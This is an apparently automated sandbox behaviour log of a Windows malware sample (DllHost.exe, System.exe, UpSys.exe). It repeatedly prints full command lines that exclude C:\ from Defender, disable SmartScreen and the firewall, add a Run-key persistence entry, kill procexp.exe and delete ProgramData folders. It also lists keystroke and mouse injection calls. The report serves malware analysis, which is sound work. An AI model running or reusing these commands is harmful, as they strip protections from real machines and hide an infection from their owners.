Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ?? Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ?? Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)Jump to behavior
Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ?? Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ?? Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)Jump to behavior
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ?? Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ?? Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ?? Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ?? Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ?? Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ?? Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)Jump to behavior
Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ?? Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ?? Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)Jump to behavior
Source: C:\ProgramData\UpSys.exeCode function: 44_2_0000000140041BD0 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,44_2_0000000140041BD0
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ?? Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ?? Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)Jump to behavior
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM procexp.exe /F && exitJump to behavior
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exitJump to behavior
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exitJump to behavior
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM procexp.exe /F && exitJump to behavior
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exitJump to behavior
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM procexp.exe /F && exitJump to behavior
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Data\* && exitJump to behavior
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exitJump to behavior
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM Jump to behavior
Source: C:\Users\user\Desktop\DllHost.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exitJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\UpSys.exe "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state offJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM procexp.exe /F Jump to behavior
Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" C:\ProgramData\UpSys.exe /SW:0 powershell.exe $(Add-MpPreference -ExclusionPath C:\); $(cd HKLM:\); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Policies\Microsoft\Windows\System ?? Name EnableSmartScreen -PropertyType DWord -Value 0); $(Set-ItemProperty -Path $HKLM\SYSTEM\CurrentControlSet\Services\mpssvc -Name Start -Value 4); $(netsh advfirewall set allprofiles state off); $(Get-Acl C:\ProgramData\Microsoft\Windows\SystemData | Set-Acl C:\ProgramData\MicrosoftNetwork); $(New-ItemProperty ?? Path $HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run ?? Name WinNet -PropertyType String -Value C:\ProgramData\MicrosoftNetwork\System.exe); $(New-Item -Path C:\ProgramData -Name check.txt -ItemType file -Value 1); $(exit)Jump to behavior
Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K taskkill /IM procexp.exe /F && exitJump to behavior
Source: C:\ProgramData\MicrosoftNetwork\System.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /K del /S /Q C:\ProgramData\Systemd\* && exitJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM procexp.exe /F
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\ProgramData\UpSys.exe "C:\ProgramData\UpSys.exe" /SW:0 powershell.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\system32\netsh.exe" advfirewall set allprofiles state off
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM procexp.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM procexp.exe /F
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 472 -p 6616 -ip 6616
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 528 -p 4352 -ip 4352
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6616 -s 2172
Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 4352 -s 2560
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
Source: C:\ProgramData\UpSys.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\ProgramData\UpSys.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\ProgramData\UpSys.exeCode function: 44_2_0000000140043E30 LogonUserW,44_2_0000000140043E30
Source: C:\ProgramData\UpSys.exeCode function: 44_2_00000001400121F0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,SetCurrentDirectoryW,GetModuleFileNameW,GetForegroundWindow,ShellExecuteW,GetForegroundWindow,ShellExecuteW,44_2_00000001400121F0
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM procexp.exe /F Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM procexp.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM procexp.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM procexp.exe /F
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\taskkill.exe taskkill /IM
Source: C:\ProgramData\UpSys.exeCode function: 44_2_000000014004E640 GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,44_2_000000014004E640
Source: C:\ProgramData\UpSys.exeCode function: 44_2_0000000140052BE0 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,44_2_0000000140052BE0
Source: UpSys.exeBinary or memory string: Shell_TrayWnd
Source: DllHost.exe, 00000000.00000003.269278397.00000208C96F9000.00000004.00000020.00020000.00000000.sdmp, System.exe, 0000000B.00000003.326890464.0000023FB3C21000.00000004.00000020.00020000.00000000.sdmp, UpSys.exe, 0000002C.00000002.381815663.0000000140097000.00000002.00000001.01000000.0000000E.sdmpBinary or memory string: ASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning
Source: C:\Users\user\Desktop\DllHost.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00007FF7191F19BC
Source: C:\Users\user\Desktop\DllHost.exeCode function: try_get_function,GetLocaleInfoW,0_2_00007FF7191E7BB8
Source: C:\Users\user\Desktop\DllHost.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,0_2_00007FF7191F0F88
Source: C:\Users\user\Desktop\DllHost.exeCode function: EnumSystemLocalesW,0_2_00007FF7191F12D4
Source: C:\Users\user\Desktop\DllHost.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00007FF7191F143C
Source: C:\Users\user\Desktop\DllHost.exeCode function: EnumSystemLocalesW,0_2_00007FF7191F13A4
Source: C:\Users\user\Desktop\DllHost.exeCode function: EnumSystemLocalesW,0_2_00007FF7191E7638
Source: C:\Users\user\Desktop\DllHost.exeCode function: GetLocaleInfoW,0_2_00007FF7191F1688
Source: C:\Users\user\Desktop\DllHost.exeCode function: GetLocaleInfoW,0_2_00007FF7191F1890
Source: C:\Users\user\Desktop\DllHost.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00007FF7191F17E0
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: GetLocaleInfoW,11_2_00007FF6E4C81688
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: EnumSystemLocalesW,11_2_00007FF6E4C77638
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,11_2_00007FF6E4C817E0
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: GetLocaleInfoW,11_2_00007FF6E4C81890
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: EnumSystemLocalesW,11_2_00007FF6E4C812D4
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: EnumSystemLocalesW,11_2_00007FF6E4C813A4
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,11_2_00007FF6E4C8143C
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: TranslateName,TranslateName,GetACP,IsValidCodePage,GetLocaleInfoW,11_2_00007FF6E4C80F88
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,11_2_00007FF6E4C819BC
Source: C:\ProgramData\MicrosoftNetwork\System.exeCode function: try_get_function,GetLocaleInfoW,11_2_00007FF6E4C77BB8
Source: C:\ProgramData\UpSys.exeCode function: GetLocaleInfoA,44_2_000000014002CAC0
Source: C:\Users\user\Desktop\DllHost.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\DllHost.exeQueries volume information: C:\ProgramData\Systemd VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
